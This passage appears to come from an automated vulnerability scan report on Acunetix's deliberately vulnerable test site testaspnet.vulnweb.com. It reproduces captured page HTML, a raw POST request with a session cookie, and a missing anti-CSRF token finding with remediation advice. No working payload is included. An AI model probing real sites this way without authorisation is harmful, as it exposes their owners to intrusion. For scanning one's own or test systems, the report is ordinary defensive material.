          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in a HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or that makes it easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

